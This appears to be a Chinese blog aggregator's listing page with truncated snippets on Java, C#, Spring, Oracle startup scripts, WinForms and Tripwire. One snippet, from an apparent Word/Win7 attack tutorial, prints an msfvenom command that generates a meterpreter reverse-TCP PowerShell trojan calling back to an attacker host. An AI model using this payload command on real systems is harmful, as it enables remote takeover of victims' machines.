多态的概述 什么是多态 同一个对象,在不同时刻表现出来的不同形态 多态的前提 1.要有继承或实现关系 2.要有方法的重写 3.要有父类引用指向子类对象 代码演示 class Animal { public void eat() { System.out.println("动物吃饭"); } } cl ...
分类:
编程语言 时间:
2021-03-29 12:34:46
阅读次数:
0
package com.company; import java.util.*; public class Main { public static void main(String arg[]) { Scanner input = new Scanner(System.in); double su ...
分类:
编程语言 时间:
2021-03-29 12:09:58
阅读次数:
0
1.通过System.Reflection.Assembly 的一些方法得到想要创建的对象的type 2.调用Activator.CreateInstance(type,args) ,创建相应的instance ...
分类:
其他好文 时间:
2021-03-26 15:31:05
阅读次数:
0
xml配置默认使用类的无参构造 #当类存在有参构造函数时 package Test; public class Hello { private String name; public Hello(){ System.out.println("Hello对象被创建"); } public Hello( ...
分类:
编程语言 时间:
2021-03-26 15:22:42
阅读次数:
0
方法一、配置shell脚本,使用/etc/rc.local 跟随系统自启动 # cat /home/oracle/script/start.sh lsnrctl start<<EOF EOF sqlplus / as sysdba <<EOF startup alter system registe ...
分类:
数据库 时间:
2021-03-26 15:17:47
阅读次数:
0
Winform基础详解三——关于program.cs program是整个Winform程序的主入口点。 [STAThread] 表示一种当前应用程序的特性 表示当前COM线程模型是单线程单元 如果没有它,winform应用程序是无法工作的 using System; using System.Co ...
Tripwire is a host based Intrusion detection system for Linux. Tripwire monitors Linux system to detect and report any unauthorized changes to the fil ...
分类:
系统相关 时间:
2021-03-18 14:32:34
阅读次数:
0
1 package com.pingfan.scanner; 2 3 import java.util.Scanner; 4 5 public class Demo3 { 6 public static void main(String[] args) { 7 Scanner scanner = n ...
分类:
其他好文 时间:
2021-03-18 14:30:41
阅读次数:
0
环境: win7 64位,word2013 生成木马 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135 LPORT=1122 -f psh-reflection >x.ps1 ? 放到VPS上,这里我们放到本机搭 ...
分类:
系统相关 时间:
2021-03-18 14:14:35
阅读次数:
0
HelloWord 新建文件夹,存放代码 新建一个Java文件 文件后缀名.java(Hello.java) 编写代码 public class Hello{ public static void main(String[] args){ System.out.print("Hello,world! ...
分类:
其他好文 时间:
2021-03-18 14:11:04
阅读次数:
0